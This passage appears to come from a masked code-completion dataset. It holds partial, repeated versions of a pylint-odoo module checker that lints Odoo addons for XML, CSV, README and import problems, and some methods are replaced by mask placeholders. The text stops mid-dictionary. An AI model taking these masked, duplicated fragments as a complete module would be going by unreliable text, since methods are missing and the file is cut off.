for xml_file in xml_files:\n ir_filter_records = self.get_xml_records(os.path.join(self.\n module_path, xml_file), model='ir.filters')\n for ir_filter_record in ir_filter_records:\n ir_filter_fields = ir_filter_record.xpath(\n \"field[@name='name' or @name='user_id']\")\n if ir_filter_fields and len(ir_filter_fields) == 1:\n self.msg_args = '%s:%d' % (xml_file, ir_filter_record.\n sourceline), ir_filter_record.get('id')\n return False\n return True\n <mask token>\n\n @staticmethod\n def _is_replaced_field(view):\n try:\n arch = view.xpath(\"field[@name='arch' and @type='xml'][1]\")[0]\n except IndexError:\n return None\n replaces = arch.xpath(\n \".//field[@name='name' and @position='replace'][1]\") + arch.xpath(\n \".//xpath[@position='replace'][1]\")\n return bool(replaces)\n\n def _check_dangerous_view_replace_wo_priority(self):\n \"\"\"Check dangerous view defined with low priority\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n xml_files = self.filter_files_ext('xml')\n for xml_file in xml_files:\n views = self.get_xml_records(os.path.join(self.module_path,\n xml_file), model='ir.ui.view')\n for view in views:\n priority = self._get_priority(view)\n is_replaced_field = self._is_replaced_field(view)\n if is_replaced_field and priority < self.config.min_priority:\n self.msg_args.append(('%s:%s' % (xml_file, view.\n sourceline), priority, self.config.min_priority))\n if self.msg_args:\n return False\n return True\n\n def _check_create_user_wo_reset_password(self):\n \"\"\"Check xml records of user without the context\n 'context=\"{'no_reset_password': True}\"'\n This context avoid send email and mail log warning\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n xml_files = self.filter_files_ext('xml')\n for xml_file in xml_files:\n user_records = self.get_xml_records(os.path.join(self.\n module_path, xml_file), model='res.users')\n self.msg_args.extend([('%s:%s' % (xml_file, user_record.\n sourceline)) for user_record in user_records if user_record\n .xpath(\"field[@name='name']\") and 'no_reset_password' not in\n (user_record.get('context') or '')])\n if self.msg_args:\n return False\n return True\n\n def _check_javascript_lint(self):\n \"\"\"Check javascript lint\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n for js_file_rel in self.filter_files_ext('js', relpath=True):\n js_file = os.path.join(self.module_path, js_file_rel)\n errors = self.check_js_lint(js_file, self.config.jslintrc)\n for error in errors:\n self.msg_args.append((js_file_rel + error,))\n if self.msg_args:\n return False\n return True\n\n def _check_deprecated_data_xml_node(self):\n \"\"\"Check deprecated <data> xml node inside <odoo> xml node\n :return: False if found <data> xml node inside <odoo> xml node\"\"\"\n xml_files = self.filter_files_ext('xml')\n self.msg_args = []\n for xml_file in xml_files:\n doc = self.parse_xml(os.path.join(self.module_path, xml_file))\n odoo_nodes = doc.xpath('/odoo') if not isinstance(doc, string_types\n ) else []\n children, data_node = (odoo_nodes[0].getchildren(), odoo_nodes[\n 0].findall('data')) if odoo_nodes else ([], [])\n if len(children) == 1 and len(data_node) == 1:\n lineno = odoo_nodes[0].sourceline\n self.msg_args.append('%s:%s' % (xml_file, lineno))\n if self.msg_args:\n return False\n return True\n <mask token>\n\n def _check_wrong_tabs_instead_of_spaces(self):\n \"\"\"Check wrong tabs character instead of four spaces.\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n for type_file in self.config.extfiles_to_lint:\n for ext_file_rel in self.filter_files_ext(type_file, relpath=True):\n ext_file = os.path.join(self.module_path, ext_file_rel)\n countline = 0\n with open(ext_file, 'rb') as fp:\n for line in fp:\n countline += 1\n line_space_trip = line.lstrip(b' ')\n if line_space_trip != line_space_trip.lstrip(b'\\t'):\n self.msg_args.append('%s:%d' % (ext_file_rel,\n countline))\n if self.msg_args:\n return False\n return True\n <mask token>\n\n def _get_manifest_referenced_files(self):\n referenced_files = {}\n for data_type in DFTL_MANIFEST_DATA_KEYS:\n for fname in (self.manifest_dict.get(data_type) or []):\n referenced_files[fname] = data_type\n return referenced_files\n\n def _get_xml_referenced_files(self):\n referenced_files = {}\n for data_type in DFTL_MANIFEST_DATA_KEYS:\n for fname in (self.manifest_dict.get(data_type) or []):\n if not fname.endswith('.xml'):\n continue\n referenced_files.update(self.\n _get_xml_referenced_files_report(fname, data_type))\n return referenced_files\n\n def _get_xml_referenced_files_report(self, fname, data_type):\n return {os.path.join(*record.attrib[attribute].split(os.sep)[1:]):\n data_type for attribute in ['xml', 'xsl'] for record in self.\n parse_xml(os.path.join(self.module_path, fname)).xpath(\n '//report[@%s]' % attribute)}\n\n def _get_module_files(self):\n module_files = []\n for type_file in self.config.extfiles_convert:\n for ext_file_rel in self.filter_files_ext(type_file, relpath=True):\n module_files.append(ext_file_rel)\n return module_files\n\n def _check_file_not_used(self):\n \"\"\"Check if a file is not used from manifest\"\"\"\n module_files = set(self._get_module_files())\n referenced_files = set(self._get_manifest_referenced_files()).union(set\n (self._get_xml_referenced_files()))\n excluded_dirs = ['static', 'test', 'tests', 'migrations']\n no_referenced_files = [f for f in module_files - referenced_files if\n f.split(os.path.sep)[0] not in excluded_dirs]\n self.msg_args = no_referenced_files\n return not no_referenced_files\n\n def _check_xml_attribute_translatable(self):\n \"\"\"The xml attribute is missing the translation=\"off\" tag\n Example <attribute name=\"groups\">sale.group</attribute>\n \"\"\"\n if self.linter._all_options['valid_odoo_versions'\n ].config.valid_odoo_versions != ['8.0']:\n return True\n self.msg_args = []\n for xml_file in self.filter_files_ext('xml', relpath=True):\n for record in self.get_xml_records(os.path.join(self.\n module_path, xml_file), None,\n '//attribute[not(@name=\"string\") and not(@translation)]'):\n self.msg_args.append(('%s:%d' % (xml_file, record.\n sourceline), 'xml_id'))\n if self.msg_args:\n return False\n return True\n\n def _check_xml_deprecated_tree_attribute(self):\n \"\"\"The tree-view declaration is using a deprecated attribute.\n Example <tree string=\"Partners\"></tree>\n \"\"\"\n checks = [{'attr': 'colors', 'skip_versions': {'4.2', '5.0', '6.0',\n '6.1', '7.0', '8.0'}, 'xpath': './/tree[@colors]'}, {'attr':\n 'fonts', 'skip_versions': {'4.2', '5.0', '6.0', '6.1', '7.0',\n '8.0'}, 'xpath': './/tree[@fonts]'}, {'attr': 'string',\n 'skip_versions': {'4.2', '5.0', '6.0', '6.1', '7.0'}, 'xpath':\n './/tree[@string]'}]\n valid_versions = set(self.linter._all_options['valid_odoo_versions'\n ].config.valid_odoo_versions)\n applicable_checks = [check for check in checks if check['attr'] in\n self.config.deprecated_tree_attributes and bool(valid_versions -\n check['skip_versions'])]\n self.msg_args = []\n for xml_file in self.filter_files_ext('xml', relpath=True):\n for record in self.get_xml_records(os.path.join(self.\n module_path, xml_file), model='ir.ui.view'):\n for check in applicable_checks:\n if record.xpath(check['xpath']):\n self.msg_args.append(('%s:%d' % (xml_file, record.\n sourceline), check['attr']))\n if self.msg_args:\n return False\n return True\n <mask token>\n",
"step-4": "<mask token>\n\n\nclass ModuleChecker(misc.WrapperModuleChecker):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n @utils.check_messages('consider-merging-classes-inherited')\n def visit_assign(self, node):\n if not self.odoo_node:\n return\n if not self.linter.is_message_enabled(\n 'consider-merging-classes-inherited', node.lineno):\n return\n node_left = node.targets[0]\n if not isinstance(node_left, astroid.node_classes.AssignName\n ) or node_left.name not in ('_inherit', '_name') or not isinstance(\n node.value, astroid.node_classes.Const) or not isinstance(node.\n parent, astroid.ClassDef):\n return\n if node_left.name == '_name':\n node.parent.odoo_attribute_name = node.value.value\n return\n _name = getattr(node.parent, 'odoo_attribute_name', None)\n _inherit = node.value.value\n if _name and _name != _inherit:\n return\n key = self.odoo_node, _inherit\n node.file = self.linter.current_file\n self.inh_dup.setdefault(key, []).append(node)\n\n def _build_whitelist_module_patterns(self):\n known_patterns = []\n for known_pattern in self.config.import_name_whitelist:\n pattern = known_pattern.replace('*', '.*').replace('?', '.?')\n known_patterns.append(re.compile('^' + pattern + '$'))\n return known_patterns\n\n def open(self):\n \"\"\"Define variables to use cache\"\"\"\n self.inh_dup = {}\n patterns = self._build_whitelist_module_patterns()\n self._whitelist_module_patterns = patterns\n super(ModuleChecker, self).open()\n\n def close(self):\n \"\"\"Final process get all cached values and add messages\"\"\"\n for (odoo_node, class_dup_name), nodes in self.inh_dup.items():\n if len(nodes) == 1:\n continue\n path_nodes = []\n for node in nodes[1:]:\n relpath = os.path.relpath(node.file, os.path.dirname(\n odoo_node.file))\n path_nodes.append('%s:%d' % (relpath, node.lineno))\n self.add_message('consider-merging-classes-inherited', node=\n nodes[0], args=(class_dup_name, ', '.join(path_nodes)))\n\n def _get_odoo_module_imported(self, node):\n odoo_module = []\n if isinstance(node, astroid.ImportFrom) and ('openerp.addons' in\n node.modname or 'odoo.addons' in node.modname):\n packages = node.modname.split('.')\n if len(packages) >= 3:\n odoo_module.append(packages[2])\n else:\n odoo_module.append(node.names[0][0])\n elif isinstance(node, astroid.Import):\n for name, _ in node.names:\n if 'openerp.addons' not in name and 'odoo.addons' not in name:\n continue\n packages = name.split('.')\n if len(packages) >= 3:\n odoo_module.append(packages[2])\n return odoo_module\n\n def check_odoo_relative_import(self, node):\n if self.odoo_module_name in self._get_odoo_module_imported(node):\n self.add_message('odoo-addons-relative-import', node=node, args\n =self.odoo_module_name)\n\n @staticmethod\n def _is_absolute_import(node, name):\n modnode = node.root()\n importedmodnode = ModuleChecker._get_imported_module(node, name)\n if (importedmodnode and importedmodnode.file and modnode is not\n importedmodnode and importedmodnode.name != name):\n return True\n return False\n\n @staticmethod\n def _get_imported_module(importnode, modname):\n try:\n return importnode.do_import_module(modname)\n except:\n pass\n\n def _is_module_name_in_whitelist(self, module_name):\n parts = module_name.split('.')\n module_names_to_check = ['.'.join(parts[:first_k]) for first_k in\n range(len(parts), 0, -1)]\n for module_name_to_check in module_names_to_check:\n for pattern in self._whitelist_module_patterns:\n if pattern.match(module_name_to_check):\n return True\n return False\n\n def _check_imported_packages(self, node, module_name):\n \"\"\"Check if the import node is a external dependency to validate it\"\"\"\n if not module_name:\n return\n if not self.manifest_dict:\n return\n if not isinstance(node.parent, astroid.Module):\n return\n if self._is_absolute_import(node, module_name):\n return\n if self._is_module_name_in_whitelist(module_name):\n return\n isort_obj = isort.SortImports(file_contents='')\n import_category = isort_obj.place_module(module_name)\n if import_category not in ('FIRSTPARTY', 'THIRDPARTY'):\n return\n relpath = os.path.relpath(node.parent.file, os.path.dirname(self.\n manifest_file))\n if os.path.dirname(relpath) == 'tests':\n return\n self.add_message('missing-import-error', node=node, args=(module_name,)\n )\n ext_deps = self.manifest_dict.get('external_dependencies') or {}\n py_ext_deps = ext_deps.get('python') or []\n if isinstance(node, astroid.ImportFrom) and (node.level or 0) >= 1:\n return\n if module_name not in py_ext_deps and module_name.split('.')[0\n ] not in py_ext_deps:\n self.add_message('missing-manifest-dependency', node=node, args\n =(module_name,))\n\n @utils.check_messages('odoo-addons-relative-import',\n 'missing-import-error', 'missing-manifest-dependency')\n def visit_importfrom(self, node):\n self.check_odoo_relative_import(node)\n if isinstance(node.scope(), astroid.Module):\n package = node.modname\n self._check_imported_packages(node, package)\n\n @utils.check_messages('odoo-addons-relative-import',\n 'missing-import-error', 'missing-manifest-dependency')\n def visit_import(self, node):\n self.check_odoo_relative_import(node)\n for name, _ in node.names:\n if isinstance(node.scope(), astroid.Module):\n self._check_imported_packages(node, name)\n\n @utils.check_messages('except-pass')\n def visit_tryexcept(self, node):\n \"\"\"Visit block try except\"\"\"\n for handler in node.handlers:\n if not handler.name and len(handler.body) == 1 and isinstance(\n handler.body[0], astroid.node_classes.Pass):\n self.add_message('except-pass', node=handler)\n\n def _check_rst_syntax_error(self):\n \"\"\"Check if rst file there is syntax error\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n rst_files = self.filter_files_ext('rst')\n self.msg_args = []\n for rst_file in rst_files:\n errors = self.check_rst_syntax(os.path.join(self.module_path,\n rst_file))\n for error in errors:\n msg = error.full_message\n res = re.search(\n 'No directive entry for \"([\\\\w|\\\\-]+)\"|Unknown directive type \"([\\\\w|\\\\-]+)\"|No role entry for \"([\\\\w|\\\\-]+)\"|Unknown interpreted text role \"([\\\\w|\\\\-]+)\"'\n , msg)\n if res:\n continue\n self.msg_args.append(('%s:%d' % (rst_file, error.line or 0),\n msg.strip('\\n').replace('\\n', '|')))\n if self.msg_args:\n return False\n return True\n\n def _check_missing_readme(self):\n \"\"\"Check if exists ./README.{rst,md,txt} file\n :return: If exists return True else False\n \"\"\"\n self.msg_args = self.config.readme_template_url,\n for readme in DFTL_README_FILES:\n if os.path.isfile(os.path.join(self.module_path, readme)):\n return True\n return False\n\n def _check_xml_syntax_error(self):\n \"\"\"Check if xml file there is syntax error\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n for xml_file in self.filter_files_ext('xml', relpath=True):\n result = self.parse_xml(os.path.join(self.module_path, xml_file))\n if isinstance(result, string_types):\n self.msg_args.append((xml_file, result.strip('\\n').replace(\n '\\n', '|')))\n if self.msg_args:\n return False\n return True\n\n def _get_duplicate_xml_record_id(self, records):\n \"\"\"Get duplicated records based on attribute id\n :param records list: List of lxml.etree.Element \"<record\"\n :return: Duplicated items.\n e.g. {record.id: [record_node1, record_node2]}\n :rtype: dict\n \"\"\"\n all_records = {}\n for record in records:\n record_id = '%s/%s_noupdate_%s' % (record.attrib.get('section',\n ''), record.attrib.get('id', ''), record.getparent().attrib\n .get('noupdate', '0'))\n all_records.setdefault(record_id, []).append(record)\n records = {}\n for key, items in all_records.items():\n if not len(items) < 2:\n records[key] = items\n return records\n\n def _check_duplicate_xml_record_id(self):\n \"\"\"Check duplicated XML-IDs inside of the files of\n each manifest-section treated them separately\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n xml_records = []\n for fname, section in self._get_manifest_referenced_files().items():\n if os.path.splitext(fname)[1].lower() != '.xml':\n continue\n fname = os.path.join(self.module_path, fname)\n for xml_record in self.get_xml_records(fname):\n xml_record.attrib['section'] = section\n xml_records.append(xml_record)\n for name, fobjs in self._get_duplicate_xml_record_id(xml_records\n ).items():\n self.msg_args.append(('%s:%d' % (os.path.relpath(fobjs[0].base,\n self.module_path), fobjs[0].sourceline), name, ', '.join([(\n os.path.relpath(fobj.base, self.module_path) + ':' + str(\n fobj.sourceline)) for fobj in fobjs[1:]])))\n if self.msg_args:\n return False\n return True\n\n def _check_duplicate_id_csv(self):\n \"\"\"Check duplicate xml id in ir.model.access.csv files of a odoo module.\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n all_csv_ids = []\n self.msg_args = []\n for csv_file_rel in self.filter_files_ext('csv', relpath=True):\n csv_file = os.path.join(self.module_path, csv_file_rel)\n if os.path.basename(csv_file) == 'ir.model.access.csv':\n all_csv_ids.extend(self.get_field_csv(csv_file))\n duplicated_ids_csv = self.get_duplicated_items(all_csv_ids)\n for duplicated_id_csv in duplicated_ids_csv:\n self.msg_args.append((csv_file_rel, duplicated_id_csv))\n if duplicated_ids_csv:\n return False\n return True\n\n def _check_redundant_modulename_xml(self):\n \"\"\"Check redundant module name in xml file.\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n for xml_file_rel in self.filter_files_ext('xml', relpath=True):\n xml_file = os.path.join(self.module_path, xml_file_rel)\n for xml_id, lineno in self.get_xml_redundant_module_name(xml_file,\n self.module):\n self.msg_args.append(('%s:%d' % (xml_file_rel, lineno), xml_id)\n )\n if self.msg_args:\n return False\n return True\n\n def _check_character_not_valid_in_resource_link(self):\n \"\"\"The resource in in src/href contains a not valid chararter\"\"\"\n self.msg_args = []\n for xml_file in self.filter_files_ext('xml'):\n doc = self.parse_xml(os.path.join(self.module_path, xml_file))\n for name, attr in (('link', 'href'), ('script', 'src')):\n nodes = doc.xpath('.//%s[@%s]' % (name, attr)\n ) if not isinstance(doc, string_types) else []\n for node in nodes:\n resource = node.get(attr, '')\n ext = os.path.splitext(os.path.basename(resource))[1]\n if resource.startswith('/') and not re.search(\n '^[.][a-zA-Z]+$', ext):\n self.msg_args.append('%s:%s' % (xml_file, node.\n sourceline))\n if self.msg_args:\n return False\n return True\n\n def _get_duplicate_xml_fields(self, fields):\n \"\"\"Get duplicated xml fields based on attribute name\n :param fields list: List of lxml.etree.Element \"<field\"\n :return: Duplicated items.\n e.g. {field.name: [field_node1, field_node2]}\n :rtype: dict\n \"\"\"\n all_fields = {}\n for field in fields:\n field_xml = field.attrib.get('name')\n if not field_xml:\n continue\n all_fields.setdefault((field_xml, field.attrib.get('context'),\n field.attrib.get('filter_domain'), field.getparent()), []\n ).append(field)\n return dict(((name, context, filter_domain, parent_node), nodes) for\n (name, context, filter_domain, parent_node), nodes in\n all_fields.items() if len(nodes) >= 2)\n\n def _check_duplicate_xml_fields(self):\n \"\"\"Check duplicate field in all record of xml files of a odoo module.\n Important note: this check does not work with inherited views.\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n for xml_file in self.filter_files_ext('xml', relpath=True):\n for record in self.get_xml_records(os.path.join(self.\n module_path, xml_file)):\n if record.xpath('field[@name=\"inherit_id\"]'):\n continue\n for xpath in ['field', 'field/*/field',\n 'field/*/field/tree/field', 'field/*/field/form/field']:\n for name, fobjs in self._get_duplicate_xml_fields(record\n .xpath(xpath)).items():\n self.msg_args.append(('%s:%d' % (xml_file, fobjs[0]\n .sourceline), name[0], ', '.join([str(fobj.\n sourceline) for fobj in fobjs[1:]])))\n if self.msg_args:\n return False\n return True\n\n def _check_dangerous_filter_wo_user(self):\n \"\"\"Check dangerous filter without a user assigned.\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n xml_files = self.filter_files_ext('xml')\n for xml_file in xml_files:\n ir_filter_records = self.get_xml_records(os.path.join(self.\n module_path, xml_file), model='ir.filters')\n for ir_filter_record in ir_filter_records:\n ir_filter_fields = ir_filter_record.xpath(\n \"field[@name='name' or @name='user_id']\")\n if ir_filter_fields and len(ir_filter_fields) == 1:\n self.msg_args = '%s:%d' % (xml_file, ir_filter_record.\n sourceline), ir_filter_record.get('id')\n return False\n return True\n\n @staticmethod\n def _get_priority(view):\n try:\n priority_node = view.xpath(\"field[@name='priority'][1]\")[0]\n return int(priority_node.get('eval', priority_node.text) or 0)\n except (IndexError, ValueError):\n pass\n return 0\n\n @staticmethod\n def _is_replaced_field(view):\n try:\n arch = view.xpath(\"field[@name='arch' and @type='xml'][1]\")[0]\n except IndexError:\n return None\n replaces = arch.xpath(\n \".//field[@name='name' and @position='replace'][1]\") + arch.xpath(\n \".//xpath[@position='replace'][1]\")\n return bool(replaces)\n\n def _check_dangerous_view_replace_wo_priority(self):\n \"\"\"Check dangerous view defined with low priority\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n xml_files = self.filter_files_ext('xml')\n for xml_file in xml_files:\n views = self.get_xml_records(os.path.join(self.module_path,\n xml_file), model='ir.ui.view')\n for view in views:\n priority = self._get_priority(view)\n is_replaced_field = self._is_replaced_field(view)\n if is_replaced_field and priority < self.config.min_priority:\n self.msg_args.append(('%s:%s' % (xml_file, view.\n sourceline), priority, self.config.min_priority))\n if self.msg_args:\n return False\n return True\n\n def _check_create_user_wo_reset_password(self):\n \"\"\"Check xml records of user without the context\n 'context=\"{'no_reset_password': True}\"'\n This context avoid send email and mail log warning\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n xml_files = self.filter_files_ext('xml')\n for xml_file in xml_files:\n user_records = self.get_xml_records(os.path.join(self.\n module_path, xml_file), model='res.users')\n self.msg_args.extend([('%s:%s' % (xml_file, user_record.\n sourceline)) for user_record in user_records if user_record\n .xpath(\"field[@name='name']\") and 'no_reset_password' not in\n (user_record.get('context') or '')])\n if self.msg_args:\n return False\n return True\n\n def _check_javascript_lint(self):\n \"\"\"Check javascript lint\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n for js_file_rel in self.filter_files_ext('js', relpath=True):\n js_file = os.path.join(self.module_path, js_file_rel)\n errors = self.check_js_lint(js_file, self.config.jslintrc)\n for error in errors:\n self.msg_args.append((js_file_rel + error,))\n if self.msg_args:\n return False\n return True\n\n def _check_deprecated_data_xml_node(self):\n \"\"\"Check deprecated <data> xml node inside <odoo> xml node\n :return: False if found <data> xml node inside <odoo> xml node\"\"\"\n xml_files = self.filter_files_ext('xml')\n self.msg_args = []\n for xml_file in xml_files:\n doc = self.parse_xml(os.path.join(self.module_path, xml_file))\n odoo_nodes = doc.xpath('/odoo') if not isinstance(doc, string_types\n ) else []\n children, data_node = (odoo_nodes[0].getchildren(), odoo_nodes[\n 0].findall('data')) if odoo_nodes else ([], [])\n if len(children) == 1 and len(data_node) == 1:\n lineno = odoo_nodes[0].sourceline\n self.msg_args.append('%s:%s' % (xml_file, lineno))\n if self.msg_args:\n return False\n return True\n\n def _check_deprecated_openerp_xml_node(self):\n \"\"\"Check deprecated <openerp> xml node\n :return: False if exists <openerp> node and\n add list of xml files in self.msg_args\n \"\"\"\n xml_files = self.filter_files_ext('xml')\n self.msg_args = []\n for xml_file in xml_files:\n doc = self.parse_xml(os.path.join(self.module_path, xml_file))\n openerp_nodes = doc.xpath('/openerp') if not isinstance(doc,\n string_types) else []\n if openerp_nodes:\n lineno = openerp_nodes[0].sourceline\n self.msg_args.append('%s:%s' % (xml_file, lineno))\n if self.msg_args:\n return False\n return True\n\n def _check_wrong_tabs_instead_of_spaces(self):\n \"\"\"Check wrong tabs character instead of four spaces.\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n for type_file in self.config.extfiles_to_lint:\n for ext_file_rel in self.filter_files_ext(type_file, relpath=True):\n ext_file = os.path.join(self.module_path, ext_file_rel)\n countline = 0\n with open(ext_file, 'rb') as fp:\n for line in fp:\n countline += 1\n line_space_trip = line.lstrip(b' ')\n if line_space_trip != line_space_trip.lstrip(b'\\t'):\n self.msg_args.append('%s:%d' % (ext_file_rel,\n countline))\n if self.msg_args:\n return False\n return True\n\n def _check_missing_newline_extrafiles(self):\n \"\"\"Check missing newline in other ext files (.xml, .csv, .po)\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n for type_file in self.config.extfiles_to_lint:\n for ext_file_rel in self.filter_files_ext(type_file, relpath=True):\n ext_file = os.path.join(self.module_path, ext_file_rel)\n last_line = ''\n with open(ext_file, 'rb') as fp:\n if os.stat(ext_file).st_size > 1:\n fp.seek(-2, os.SEEK_END)\n last_line = fp.readline()\n if not (last_line.endswith(b'\\n') or last_line.\n endswith(b'\\r')):\n self.msg_args.append((ext_file_rel,))\n if self.msg_args:\n return False\n return True\n\n def _get_manifest_referenced_files(self):\n referenced_files = {}\n for data_type in DFTL_MANIFEST_DATA_KEYS:\n for fname in (self.manifest_dict.get(data_type) or []):\n referenced_files[fname] = data_type\n return referenced_files\n\n def _get_xml_referenced_files(self):\n referenced_files = {}\n for data_type in DFTL_MANIFEST_DATA_KEYS:\n for fname in (self.manifest_dict.get(data_type) or []):\n if not fname.endswith('.xml'):\n continue\n referenced_files.update(self.\n _get_xml_referenced_files_report(fname, data_type))\n return referenced_files\n\n def _get_xml_referenced_files_report(self, fname, data_type):\n return {os.path.join(*record.attrib[attribute].split(os.sep)[1:]):\n data_type for attribute in ['xml', 'xsl'] for record in self.\n parse_xml(os.path.join(self.module_path, fname)).xpath(\n '//report[@%s]' % attribute)}\n\n def _get_module_files(self):\n module_files = []\n for type_file in self.config.extfiles_convert:\n for ext_file_rel in self.filter_files_ext(type_file, relpath=True):\n module_files.append(ext_file_rel)\n return module_files\n\n def _check_file_not_used(self):\n \"\"\"Check if a file is not used from manifest\"\"\"\n module_files = set(self._get_module_files())\n referenced_files = set(self._get_manifest_referenced_files()).union(set\n (self._get_xml_referenced_files()))\n excluded_dirs = ['static', 'test', 'tests', 'migrations']\n no_referenced_files = [f for f in module_files - referenced_files if\n f.split(os.path.sep)[0] not in excluded_dirs]\n self.msg_args = no_referenced_files\n return not no_referenced_files\n\n def _check_xml_attribute_translatable(self):\n \"\"\"The xml attribute is missing the translation=\"off\" tag\n Example <attribute name=\"groups\">sale.group</attribute>\n \"\"\"\n if self.linter._all_options['valid_odoo_versions'\n ].config.valid_odoo_versions != ['8.0']:\n return True\n self.msg_args = []\n for xml_file in self.filter_files_ext('xml', relpath=True):\n for record in self.get_xml_records(os.path.join(self.\n module_path, xml_file), None,\n '//attribute[not(@name=\"string\") and not(@translation)]'):\n self.msg_args.append(('%s:%d' % (xml_file, record.\n sourceline), 'xml_id'))\n if self.msg_args:\n return False\n return True\n\n def _check_xml_deprecated_tree_attribute(self):\n \"\"\"The tree-view declaration is using a deprecated attribute.\n Example <tree string=\"Partners\"></tree>\n \"\"\"\n checks = [{'attr': 'colors', 'skip_versions': {'4.2', '5.0', '6.0',\n '6.1', '7.0', '8.0'}, 'xpath': './/tree[@colors]'}, {'attr':\n 'fonts', 'skip_versions': {'4.2', '5.0', '6.0', '6.1', '7.0',\n '8.0'}, 'xpath': './/tree[@fonts]'}, {'attr': 'string',\n 'skip_versions': {'4.2', '5.0', '6.0', '6.1', '7.0'}, 'xpath':\n './/tree[@string]'}]\n valid_versions = set(self.linter._all_options['valid_odoo_versions'\n ].config.valid_odoo_versions)\n applicable_checks = [check for check in checks if check['attr'] in\n self.config.deprecated_tree_attributes and bool(valid_versions -\n check['skip_versions'])]\n self.msg_args = []\n for xml_file in self.filter_files_ext('xml', relpath=True):\n for record in self.get_xml_records(os.path.join(self.\n module_path, xml_file), model='ir.ui.view'):\n for check in applicable_checks:\n if record.xpath(check['xpath']):\n self.msg_args.append(('%s:%d' % (xml_file, record.\n sourceline), check['attr']))\n if self.msg_args:\n return False\n return True\n\n def _check_xml_deprecated_qweb_directive(self):\n \"\"\"Check for use of deprecated QWeb directives t-*-options.\n :return: False if deprecated directives are found, in which case\n self.msg_args will contain the error messages.\n \"\"\"\n valid_versions = set(self.linter._all_options['valid_odoo_versions'\n ].config.valid_odoo_versions)\n if not valid_versions & {'10.0', '11.0'}:\n return True\n deprecated_directives = {'t-esc-options', 't-field-options',\n 't-raw-options'}\n directive_attrs = '|'.join('@%s' % d for d in deprecated_directives)\n xpath = '|'.join('/%s//template//*[%s]' % (tag, directive_attrs) for\n tag in ('odoo', 'openerp'))\n self.msg_args = []\n for xml_file in self.filter_files_ext('xml', relpath=False):\n doc = self.parse_xml(xml_file)\n if isinstance(doc, string_types):\n continue\n for node in doc.xpath(xpath):\n directive = next(iter(set(node.attrib) & deprecated_directives)\n )\n self.msg_args.append(('%s:%d' % (xml_file, node.sourceline),\n directive))\n return not bool(self.msg_args)\n",
"step-5": "\"\"\"Visit module to add odoo checks\n\"\"\"\n\nimport os\nimport re\n\nimport astroid\nimport isort\nfrom pylint.checkers import utils\nfrom six import string_types\n\nfrom .. import misc, settings\n\nODOO_MSGS = {\n # C->convention R->refactor W->warning E->error F->fatal\n\n # Visit odoo module with settings.BASE_OMODULE_ID\n 'C%d02' % settings.BASE_OMODULE_ID: (\n 'Missing ./README.rst file. Template here: %s',\n 'missing-readme',\n settings.DESC_DFLT\n ),\n 'E%d01' % settings.BASE_OMODULE_ID: (\n '%s %s',\n 'rst-syntax-error',\n settings.DESC_DFLT\n ),\n 'E%d02' % settings.BASE_OMODULE_ID: (\n '%s error: %s',\n 'xml-syntax-error',\n settings.DESC_DFLT\n ),\n 'W%d01' % settings.BASE_OMODULE_ID: (\n '%s Dangerous filter without explicit `user_id` in xml_id %s',\n 'dangerous-filter-wo-user',\n settings.DESC_DFLT\n ),\n 'W%d02' % settings.BASE_OMODULE_ID: (\n '%s Duplicate xml record id \"%s\" in %s',\n 'duplicate-xml-record-id',\n settings.DESC_DFLT\n ),\n 'W%d03' % settings.BASE_OMODULE_ID: (\n '%s',\n 'javascript-lint',\n settings.DESC_DFLT\n ),\n 'W%d04' % settings.BASE_OMODULE_ID: (\n '%s Deprecated <openerp> xml node',\n 'deprecated-openerp-xml-node',\n settings.DESC_DFLT\n ),\n 'W%d05' % settings.BASE_OMODULE_ID: (\n '%s record res.users without '\n 'context=\"{\\'no_reset_password\\': True}\"',\n 'create-user-wo-reset-password',\n settings.DESC_DFLT\n ),\n 'W%d06' % settings.BASE_OMODULE_ID: (\n '%s Duplicate id \"%s\"',\n 'duplicate-id-csv',\n settings.DESC_DFLT\n ),\n 'W%d07' % settings.BASE_OMODULE_ID: (\n '%s Duplicate xml field \"%s\" in lines %s',\n 'duplicate-xml-fields',\n settings.DESC_DFLT\n ),\n 'W%d08' % settings.BASE_OMODULE_ID: (\n '%s Missing newline',\n 'missing-newline-extrafiles',\n settings.DESC_DFLT\n ),\n 'W%d09' % settings.BASE_OMODULE_ID: (\n '%s Redundant name module reference in xml_ids \"%s\".',\n 'redundant-modulename-xml',\n settings.DESC_DFLT\n ),\n 'W%d10' % settings.BASE_OMODULE_ID: (\n '%s Use wrong tabs indentation instead of four spaces',\n 'wrong-tabs-instead-of-spaces',\n settings.DESC_DFLT\n ),\n 'R%d80' % settings.BASE_OMODULE_ID: (\n 'Consider merging classes inherited to \"%s\" from %s.',\n 'consider-merging-classes-inherited',\n settings.DESC_DFLT\n ),\n 'W%d50' % settings.BASE_OMODULE_ID: (\n 'Same Odoo module absolute import. You should use '\n 'relative import with \".\" '\n 'instead of \"openerp.addons.%s\"',\n 'odoo-addons-relative-import',\n settings.DESC_DFLT\n ),\n 'W%d40' % settings.BASE_OMODULE_ID: (\n '%s Dangerous use of \"replace\" from view '\n 'with priority %s < %s. '\n 'Increase priority or don\\'t use \"replace\". '\n 'For more information see https://odoo-development.readthedocs.io/en/latest/dev/xml/inherit.html#collisions-and-priority ',\n 